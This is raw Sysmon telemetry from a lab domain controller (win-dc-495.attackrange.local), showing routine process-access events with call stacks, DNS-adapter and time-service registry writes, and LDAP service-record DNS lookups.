13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 10341000x80000000000000002924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.688{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.641{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.626{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.626{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000002912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.579{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000002955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:42.860{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch2\EpochDWORD (0x0000037b) 22542200x80000000000000002961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.770{59A5CD1D-8E46-6005-1400-00000000A301}1304win-dc-495.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.685{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.677{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.668{59A5CD1D-8E44-6005-0B00-00000000A301}856ForestDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002957Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.660{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002956Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.644{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.DomainDnsZones.attackrange.local.9003type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 13241300x80000000000000002981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000002980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000002979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 
13241300x80000000000000002978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x80000000000000002977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x80000000000000002976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x80000000000000002975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x80000000000000002974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x80000000000000002973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x80000000000000002972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x80000000000000002971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x80000000000000002970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-495 13241300x80000000000000002969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:44.782{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 22542200x80000000000000002968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:42.653{59A5CD1D-8E56-6005-2E00-00000000A301}2464sv.symcb.com0type: 5 crl-symcprod.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\sysmon64.exe 22542200x80000000000000002967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:41.904{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.903{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.901{59A5CD1D-8E44-6005-0B00-00000000A301}856ForestDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.900{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.898{59A5CD1D-8E44-6005-0B00-00000000A301}856DomainDnsZones.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:41.870{59A5CD1D-8E46-6005-1400-00000000A301}1304attackrange.local0type: 2 win-dc-495.attackrange.local;10.0.1.14;C:\Windows\System32\svchost.exe 13241300x80000000000000002982Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:46.641{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0xaff0d347) 13241300x80000000000000002995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
